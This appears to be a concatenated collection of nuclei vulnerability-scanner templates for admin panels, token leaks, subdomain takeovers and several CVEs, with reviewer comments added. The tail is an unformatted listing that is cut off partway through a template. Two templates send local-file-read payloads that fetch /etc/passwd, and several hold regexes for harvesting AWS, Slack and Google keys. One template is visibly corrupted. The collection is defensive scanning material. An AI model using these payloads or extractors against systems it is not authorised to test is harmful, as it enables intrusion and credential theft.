          - "hybris Management Console"

# ---- /exposed-panels/sonicwall-management-panel.yaml ----
id: sonicwall-management-panel

info:
  name: SonicWall Management Panel
  severity: info
  author: PR3R00T
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth.html"
    matchers:
      - type: word
        # either phrase is enough (default "or" condition)
        words:
          - "SonicWall - Authentication"
          - "SonicWall Administrator"

# ---- /exposures/files/lazy-file.yaml ----
id: lazy-file-manager

info:
  name: Lazy File Manager
  severity: medium
  author: amsda
  tags: exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/lfm.php"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - Lazy File Manager

# ---- /exposures/tokens/mailchimp/mailchimp-api-key.yaml ----
id: mailchimp-access-key-value

info:
  name: Mailchimp API Value
  severity: info
  author: puzzlepeaches
  tags: exposure,token,mailchimp

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        # 32 hex characters followed by the "-usNN" data-centre suffix
        regex:
          - "[0-9a-f]{32}-us[0-9]{1,2}"
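# Reflowed nuclei templates from a collapsed listing; every file is introduced by a "# ---- path ----" comment.

# ---- /exposures/tokens/paypal/braintree-access-token.yaml ----
id: braintree-access-token

info:
  name: PayPal Braintree Access Token Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'

# ---- /takeovers/bigcartel-takeover.yaml ----
id: bigcartel-takeover

info:
  name: Bigcartel Takeover Detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          # The listing had this phrase surrounded by blank lines, which would fold literal newlines into
          # the matcher and make it miss the page. Reflowed onto one line; the apostrophe is U+2019 as in
          # the original. Any HTML markup around the phrase upstream was stripped in this copy - verify.
          - "Oops! We couldn’t find that page."

# ---- /takeovers/helpscout-takeover.yaml ----
id: helpscout-takeover

info:
  name: helpscout takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "No settings were found for this company:"

# ---- /exposed-panels/django-admin-panel.yaml ----
id: django-admin-panel

info:
  name: Python Django Admin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin/login/?next=/admin/"
    matchers:
      - type: word
        words:
          - "Django administration"
        condition: and
        part: body

# ---- /exposed-panels/jenkins-login.yaml ----
id: jenkins-login

info:
  name: Jenkins Login
  author: pdteam
  severity: info
  tags: panel,jenkins

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Sign in [Jenkins]'
      - type: status
        status:
          - 200

# ---- /exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml ----
id: newrelic-synthetics-location-key

info:
  name: Synthetics Location Key Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'

# ---- /exposures/tokens/zapier/zapier-webhook-token.yaml ----
id: zapier-webhook-token

info:
  name: Zapier Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          # the dot in the optional "www." prefix is now escaped; it was a wildcard in the original
          - 'https://(?:www\.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'

# ---- /network/sap-router.yaml ----
id: sap-router

info:
  name: SAPRouter Detection
  author: randomstr1ng
  severity: info
  tags: network,sap

network:
  - inputs:
      # hex for "WHOAREYOU?\n"
      - data: 57484f415245594f553f0a
        type: hex

    host:
      - "{{Hostname}}"
      - "{{Hostname}}:3299"
    read-size: 1024

    matchers:
      - type: word
        words:
          - "SAProuter"

# ---- /takeovers/airee-takeover.yaml ----
id: airee-takeover

info:
  name: Airee Takeover Detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        name: airee
        words:
          # Russian: "Error 402. The Airee service has not been paid for" (kept in the original language
          # because it is matched against the served page)
          - 'Ошибка 402. Сервис Айри.рф не оплачен'

# ---- /takeovers/ngrok-takeover.yaml ----
id: ngrok-takeover

info:
  name: ngrok takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - ngrok.io not found
          - Tunnel *.ngrok.io not found

# ---- /technologies/default-iis7-page.yaml ----
id: default-iis7-page

info:
  name: IIS-7 Default Page
  author: dhiyaneshDk
  severity: info
  tags: tech,iis
  reference: https://www.shodan.io/search?query=http.title%3A%22IIS7%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "IIS7"
        part: body

# ---- /cves/2018/CVE-2018-7251.yaml ----
id: CVE-2018-7251

info:
  name: AnchorCMS Error Log Exposure
  author: pdteam
  severity: medium
  tags: cve,cve2018,anchorcms,logs

requests:
  - method: GET
    path:
      - '{{BaseURL}}/anchor/errors.log'
    matchers:
      - type: word
        # all three JSON keys of a serialized exception entry must be present
        words:
          - '"date":'
          - '"message":'
          - '"trace":['
        condition: and

# ---- /exposed-panels/somfy-login.yaml ----
id: somfy-login

info:
  name: Somfy Login Page
  author: DhiyaneshDK
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/m_login.htm'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - Home motion by Somfy

      - type: status
        status:
          - 200

# ---- /exposures/tokens/artifactory/artifactory-api-password.yaml ----
id: artifactory-api-password

info:
  name: Artifactory Password Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,artifactory

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'

# ---- /exposures/tokens/google/google-api-key.yaml ----
id: google-api-key

info:
  name: Google API Key
  author: Swissky
  severity: info
  tags: exposure,token,google

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      # deliberate non-existent path: custom 404 pages often embed front-end config including keys
      - "{{BaseURL}}/hopfully404"

    extractors:
      - type: regex
        part: body
        regex:
          - "AIza[0-9A-Za-z\\-_]{35}"

# ---- /iot/network-camera-detect.yaml ----
id: network-camera-detect

info:
  name: Various Online Devices Detection (Network Camera)
  author: iamthefrogy
  severity: info
  tags: iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/CgiStart?page=Single"
    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - Network Camera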
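# Reflowed nuclei templates from a collapsed listing; every file is introduced by a "# ---- path ----" comment.

# ---- /misconfiguration/phpmyadmin-setup.yaml ----
id: phpmyadmin-setup

info:
  name: phpMyAdmin setup page
  author: thevillagehacker
  severity: medium
  tags: phpmyadmin
  reference: https://hackerone.com/reports/297339

requests:
  - method: GET
    path:
      - "{{BaseURL}}/phpmyadmin/setup/index.php"
    matchers:
      - type: word
        words:
          - "phpMyAdmin setup"

# ---- /exposed-panels/citrix-adc-gateway-detect.yaml ----
id: citrix-adc-gateway-panel

info:
  name: Citrix ADC Gateway detect
  author: organiccrap
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/logon/LogonPoint/index.html'
      - '{{BaseURL}}/logon/LogonPoint/custom.html'

    matchers:
      - type: word
        words:
          - '_ctxstxt_CitrixCopyright'

# ---- /exposed-panels/fortinet-fortigate-panel.yaml ----
id: fortinet-fortigate-panel

info:
  name: Fortinet FortiGate SSL VPN Panel
  author: bsysop
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/remote/login"

    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "/remote/fgt_lang"
        part: body

# ---- /exposed-panels/lancom-router-panel.yaml ----
id: lancom-router-panel

info:
  name: Lancom Router Panel
  author: __Fazal
  severity: info
  tags: panel,lancom

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        # matches one specific model string only; other LANCOM devices are not covered
        words:
          - "LANCOM 1790VA-4G"

# ---- /exposures/tokens/google/fcm-server-key.yaml ----
id: fcm-server-key

info:
  name: FCM Server Key
  author: absshax
  severity: high
  tags: exposure,token,google
  reference: https://abss.me/posts/fcm-takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}"

# ---- /exposures/tokens/google/google-calendar-link.yaml ----
id: google-calendar-link

info:
  name: Google Calendar URI Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,google

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+'

# ---- /takeovers/brightcove-takeover.yaml ----
id: brightcove-takeover

info:
  name: brightcove takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          # This copy carried an empty string here. An empty word matcher matches every response, so the
          # template would raise a high-severity takeover on every host it touched. Restored from the
          # Brightcove fingerprint in the referenced can-i-take-over-xyz list - verify against the
          # provider's current error page before relying on it.
          - '<p class="bc-gallery-error-code">Error Code: 404</p>'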
# Reflowed nuclei templates; each file of the listing is introduced by a "# ---- path ----" comment.

# ---- /takeovers/pantheon-takeover.yaml ----
id: pantheon-takeover

info:
  name: pantheon takeover detection
  severity: high
  author: pdteam
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "The gods are wise, but do not know of the site which you seek."

# ---- /takeovers/uberflip-takeover.yaml ----
id: uberflip-takeover

info:
  name: uberflip takeover detection
  severity: high
  author: pdteam
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Non-hub domain, The URL you've accessed does not provide a hub."

# ---- /workflows/magmi-workflow.yaml ----
id: magmi-workflow

info:
  name: MAGMI Security Checks
  author: dwisiswant0
  description: A simple workflow that runs all MAGMI related nuclei templates on a given target.

# the CVE checks only run once the detection template matches
workflows:
  - template: technologies/magmi-detect.yaml
    subtemplates:
      - template: cves/2017/CVE-2017-7391.yaml
      - template: cves/2020/CVE-2020-5776.yaml
      - template: cves/2020/CVE-2020-5777.yaml

# ---- /exposed-panels/sap-hana-xsengine-panel.yaml ----
id: sap-hana-xsengine-panel

info:
  name: SAP HANA XSEngine Admin Panel
  severity: info
  author: PR3R00T
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/sap/hana/xs/formLogin/login.html"
    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "/sap/hana/xs/formLogin/images/sap.png"

# ---- /exposures/configs/airflow-configuration-exposure.yaml ----
id: airflow-configuration-exposure

info:
  name: Apache Airflow Configuration Exposure
  severity: medium
  author: pdteam
  tags: exposure,config,airflow,apache

requests:
  - method: GET
    path:
      - '{{BaseURL}}/airflow.cfg'
    matchers:
      - type: word
        # both section headers are required (and-condition) to avoid matching unrelated INI files;
        # the template only proves the file is readable - review its contents, which may hold secrets
        words:
          - '[core]'
          - '[api]'
        condition: and

# ---- /exposures/logs/elmah-log-file.yaml ----
id: elmah-log-file

info:
  name: elmah.axd Disclosure
  severity: medium
  author: shine
  tags: logs,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/elmah.axd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Error Log for'

      - type: status
        status:
          - 200
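# Reflowed nuclei templates from a collapsed listing; every file is introduced by a "# ---- path ----" comment.

# ---- /exposures/tokens/cloudinary/cloudinary-credentials.yaml ----
id: cloudinary-credentials

info:
  name: Cloudinary Credentials Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,cloudinary

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          # cloudinary://<api_key>:<api_secret>@<cloud_name>
          - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'

# ---- /miscellaneous/dir-listing.yaml ----
id: dir-listing

info:
  name: Directory listing enabled
  author: _harleo,pentest_swissky
  severity: info
  tags: misc,generic

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        # one phrase per common server (Python http.server, Apache/nginx, IIS, ASP.NET)
        words:
          - "Directory listing for"
          - "Index of /"
          - "[To Parent Directory]"
          - "Directory: /"

# ---- /misconfiguration/cx-cloud-upload-detect.yaml ----
id: cx-cloud-upload-detect

info:
  name: CX Cloud Unauthenticated Upload Detect
  author: dhiyaneshDk
  severity: info
  tags: upload

requests:
  - method: GET
    path:
      - '{{BaseURL}}/upload.jsp'
    matchers:
      - type: word
        words:
          - "Display file upload form to the user"
        condition: and

# ---- /misconfiguration/exposed-kafdrop.yaml ----
id: exposed-kafdrop

info:
  name: Publicly exposed Kafdrop Interface
  author: dhiyaneshDk
  severity: low
  tags: exposure,misconfig

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        words:
          - "Kafdrop: Broker List"
          - "Kafka Cluster Overview"
        condition: and

# ---- /takeovers/anima-takeover.yaml ----
id: anima-takeover

info:
  name: Anima Takeover Detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "If this is your website and you've just created it, try refreshing in a minute"

# ---- /takeovers/simplebooklet-takeover.yaml ----
id: simplebooklet-takeover

info:
  name: simplebooklet takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          # CORRUPT IN THIS COPY: the listing fuses the Simplebooklet phrase with the tail of an
          # unrelated Apache Tomcat detection template ('... Apache Tomcat" / part: body'). The text
          # below is reproduced as found and must be replaced with the upstream fingerprint before use.
          - We can't find this Apache Tomcat"
        part: body

# ---- /technologies/telerik-fileupload-detect.yaml ----
id: telerik-fileupload-detect

info:
  name: Detect Telerik Web UI fileupload handler
  author: organiccrap
  severity: info
  tags: tech,telerik

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"

    matchers:
      - type: word
        words:
          # "succesfully" is the spelling the handler itself emits - do not correct it
          - "RadAsyncUpload handler is registered succesfully"

# ---- /cves/2018/CVE-2018-14728.yaml ----
id: CVE-2018-14728

info:
  name: Responsive filemanager 9.13.1 - SSRF/LFI
  author: madrobot
  severity: high
  tags: cve,cve2018,ssrf,lfi

# Intrusive: this template exercises the flaw by making the target fetch and return file:///etc/passwd.
requests:
  - method: POST
    path:
      - "{{BaseURL}}/filemanager/upload.php"
    headers:
      # explicit form encoding so PHP populates $_POST['url'] from the body regardless of client defaults
      Content-Type: application/x-www-form-urlencoded

    body: "fldr=&url=file:///etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# ---- /dns/worksites-detection.yaml ----
id: detect-worksites

info:
  name: worksites.net service detection
  author: melbadry9
  severity: info
  tags: dns
  reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites

dns:
  - name: "{{FQDN}}"
    type: A
    class: inet
    recursion: true
    retries: 2
    matchers:
      - type: word
        # the provider's shared address; a match only says the name resolves there, not that it dangles
        words:
          - "69.164.223.206"

# ---- /exposed-panels/ambari-exposure.yaml ----
id: ambari-exposure

info:
  name: Apache Ambari Exposure / Unauthenticated Access
  author: pdteam
  severity: medium
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        # NOTE(review): these strings identify the Ambari UI; they do not prove unauthenticated access
        # (a login page can carry both), so confirm before reporting under the "Unauthenticated" name.
        words:
          - 'Ambari'
          - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
        condition: and

# ---- /exposed-panels/rstudio-detect.yaml ----
id: rstudio-detect

info:
  name: RStudio panel detector
  author: philippedelteil
  severity: info
  tags: panel,rstudio

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        # the product name is matched in response headers of the 302 to the sign-in page
        words:
          - 'RStudio'
        part: header
      - type: status
        status:
          - 302

# ---- /exposed-panels/sharecenter-login.yaml ----
id: sharecenter-login

info:
  name: ShareCenter Login Page
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6892
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "ShareCenter"
          - "Please Select Your Account"
        condition: and

# ---- /exposed-panels/xenforo-login.yaml ----
id: xenforo-login

info:
  name: XenForo Login/Register
  author: dhiyaneshDk
  severity: info
  reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php'

    matchers:
      - type: word
        words:
          - 'XenForo'
        condition: and

# ---- /exposures/tokens/slack/slack-webhook-token.yaml ----
id: slack-webhook-token

info:
  name: Slack Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,slack

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          # Team/bot IDs were fixed at 8 characters after the T/B prefix in the original; newer
          # workspaces use longer IDs, so the segments accept 8 or more (existing matches are unaffected).
          - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8,}/B[a-zA-Z0-9_]{8,}/[a-zA-Z0-9_]{24}"

# ---- /network/expn-mail-detect.yaml ----
id: expn-mail-detect

info:
  name: EXPN Mail Server Detect
  author: r3dg33k
  severity: info
  tags: mail,expn,network

network:
  - inputs:
      # hex for "ehlo checktls\n"
      - data: "65686c6f20636865636b746c730a"
        type: hex
    read-size: 2048

    host:
      - "{{Hostname}}"
      - "{{Hostname}}:25"

    matchers:
      - type: word
        words:
          # "250-EXPN" only appears when EXPN is not the last EHLO capability; per RFC 5321 the final
          # line of a multi-line reply uses a space ("250 EXPN"), so both forms are accepted.
          - "250-EXPN"
          - "250 EXPN"
        condition: or

# ---- /technologies/fanruanoa2012-detect.yaml ----
id: fanruanoa2012-detect

info:
  name: FanRuanOA2012-detect
  author: YanYun
  severity: info
  tags: oa,java,fanruan,tech

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'down.download?FM_SYS_ID'

# ---- /workflows/cisco-asa-workflow.yaml ----
id: cisco-asa-workflow

info:
  name: Cisco ASA Security Checks
  author: flag007
  description: A simple workflow that runs all Cisco related nuclei templates on a given target.

workflows:
  - template: exposed-panels/cisco-asa-panel.yaml
    subtemplates:
      - template: cves/2020/CVE-2020-3187.yaml
      - template: cves/2020/CVE-2020-3452.yaml
      - template: cves/2018/CVE-2018-0296.yaml

# ---- /exposed-panels/cisco-asa-panel.yaml ----
id: cisco-asa-panel-detect

info:
  name: Cisco ASA VPN panel detect
  author: organiccrap
  severity: info
  tags: cisco,panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/+CSCOE+/logon.html"

    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "SSL VPN Service"
        part: body

# ---- /exposed-panels/clave-login-panel.yaml ----
id: clave-login-panel

info:
  name: Clave login panel
  author: __Fazal
  severity: info
  tags: panel,clave

requests:
  - method: GET
    path:
      - '{{BaseURL}}/admin.php'

    redirects: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        # NOTE(review): "Clave" is also the Spanish word for "key"/"password" and appears on many
        # unrelated login forms; expect false positives and confirm the product by hand.
        words:
          - "Clave"

# ---- /exposed-panels/hivemanager-login-panel.yaml ----
id: hivemanager-login-panel
info:
  name: HiveManager Login panel
  author: binaryfigments
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/hm/login.action'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "HiveManager Login"
      - type: status
        status:
          - 200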
-------------------------------------------------------------------------------- /exposed-panels/netlify-cms.yaml: -------------------------------------------------------------------------------- 1 | id: netlify-cms 2 | 3 | info: 4 | name: Netlify CMS Admin Panel 5 | author: sullo 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Netlify CMS" 22 | part: body 23 | -------------------------------------------------------------------------------- /exposed-panels/netscalar-aaa-login.yaml: -------------------------------------------------------------------------------- 1 | id: netscalar-aaa-login 2 | 3 | info: 4 | name: NetScaler AAA Login Panel 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6898 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/logon/LogonPoint/tmindex.html' 14 | matchers: 15 | - type: word 16 | words: 17 | - "NetScaler AAA" 18 | condition: and 19 | -------------------------------------------------------------------------------- /exposed-panels/workspace-one-uem.yaml: -------------------------------------------------------------------------------- 1 | id: workspace-one-uem 2 | 3 | info: 4 | name: Workspace ONE UEM AirWatch Login Page 5 | author: gevakun 6 | severity: info 7 | reference: https://twitter.com/Jhaddix/status/1295861505963909120 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/AirWatch/Login" 14 | matchers: 15 | - type: word 16 | words: 17 | - "About VMware AirWatch" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/aws-access-key-value.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key-value 2 | 3 
| info: 4 | name: AWS Access Key ID Value 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,aws,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 19 | -------------------------------------------------------------------------------- /network/java-rmi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: java-rmi-detect 2 | 3 | info: 4 | name: Detect Java RMI Protocol 5 | author: F1tz 6 | severity: info 7 | tags: network,rmi 8 | 9 | network: 10 | - inputs: 11 | - data: "{{hex_decode('4a524d4900024b')}}" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | read-size: 1024 16 | 17 | matchers: 18 | - type: regex 19 | part: raw 20 | regex: 21 | - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" -------------------------------------------------------------------------------- /takeovers/getresponse-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: getresponse-takeover 2 | 3 | info: 4 | name: getresponse takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'With GetResponse Landing Pages, lead generation has never been easier' -------------------------------------------------------------------------------- /technologies/default-jetty-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-jetty-page 2 | 3 | info: 4 | name: Jetty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,jetty 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - 
'{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Powered By Jetty" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/harbor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-detect 2 | 3 | info: 4 | name: Harbor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,harbor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Harbor" 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /workflows/mida-eframework-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mida-eframework-workflow 2 | 3 | info: 4 | name: Mida eFramework Security Checks 5 | author: CasperGN 6 | description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: mida-eframework 12 | subtemplates: 13 | - template: vulnerabilities/other/mida-eframework-xss.yaml 14 | -------------------------------------------------------------------------------- /exposed-panels/livezilla-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: livezilla-login-panel 2 | 3 | info: 4 | name: Livezilla login detect 5 | author: __Fazal 6 | severity: info 7 | tags: panel,livezilla 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/mobile/index.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - 'LiveZilla' -------------------------------------------------------------------------------- /exposed-panels/strapi-panel.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-panel 2 | 3 | info: 4 | name: Strapi Login Panel 5 | author: idealphase 6 | severity: info 7 | tags: panel,strapi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/auth/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "Strapi Admin" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /miscellaneous/display-via-header.yaml: -------------------------------------------------------------------------------- 1 | id: display-via-header 2 | 3 | info: 4 | name: Display Via Header 5 | author: geeknik 6 | reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via 7 | severity: info 8 | tags: misc,generic 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | redirects: true 16 | extractors: 17 | - type: regex 18 | part: header 19 | regex: 20 | - "Via:.*" 21 | 
-------------------------------------------------------------------------------- /misconfiguration/nginx/nginx-status.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-status 2 | 3 | info: 4 | name: Nginx Status Page 5 | author: dhiyaneshDK 6 | severity: low 7 | tags: misconfig,nginx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/nginx_status" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Active connections:' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /takeovers/webflow-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: webflow-takeover 2 | 3 | info: 4 | name: webflow takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | -

The page you are looking for doesn't exist or has been moved.

-------------------------------------------------------------------------------- /takeovers/wufoo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wufoo-takeover 2 | 3 | info: 4 | name: wufoo takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Profile not found 19 | - Hmmm....something is not right. 20 | condition: and -------------------------------------------------------------------------------- /vulnerabilities/other/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | info: 3 | name: MyuCMS Local File Read 4 | author: princechaddha 5 | severity: high 6 | tags: myucms,lfi 7 | reference: https://blog.csdn.net/yalecaltech/article/details/104908257 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "root:.*:0:0:" 17 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,aws 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 